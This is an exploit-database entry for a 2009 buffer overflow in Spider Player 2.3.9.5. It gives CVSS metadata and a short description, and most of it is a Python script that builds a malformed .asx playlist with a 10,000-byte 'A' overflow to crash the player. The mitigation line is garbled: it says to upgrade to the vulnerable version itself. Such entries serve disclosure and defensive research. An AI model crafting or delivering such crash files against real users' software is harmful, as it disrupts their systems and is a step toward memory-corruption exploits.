Spider Player 2.3.9.5 Crash Exploit

vendor:

Spider Player

by:

milw0rm.com

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Spider Player

Affected Version From: 2.3.9.5

Affected Version To: 2.3.9.5

Patch Exists: YES

Related CWE: N/A

CPE: a:spider_player:spider_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

Spider Player 2.3.9.5 Crash Exploit

Spider Player 2.3.9.5 is vulnerable to a buffer overflow vulnerability when a specially crafted .asx file is opened. The vulnerability is caused due to a boundary error when handling the .asx file, which can be exploited to cause a stack-based buffer overflow by writing a large amount of data to the file.

Mitigation:

Upgrade to the latest version of Spider Player 2.3.9.5

Source

Exploit-DB raw data:

#exploit.py
#Spider Player 2.3.9.5 Crash Exploit
#others files can be used for crash  m3u , pls .... 

print " Spider Player 2.3.9.5 off by one Crash Exploit ( asx file ) \n"

         	
header1 = (
			"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33"
		        "\x2E\x30\x22\x3E\x0A\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x3C\x54"
			"\x49\x54\x4C\x45\x3E\x65\x78\x70\x6C\x6F\x69\x74\x3C\x2F\x54"
			"\x49\x54\x4C\x45\x3E\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46"
			"\x3D\x22"
			)

header2 = (
			"\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59"
			"\x3E\x3C\x2F\x41\x53\x58\x3E"
		   )
			
crash = "\x41" * 10000

exploit = header1 + crash  + header2

try:
    out_file = open("crash.asx",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-01-30]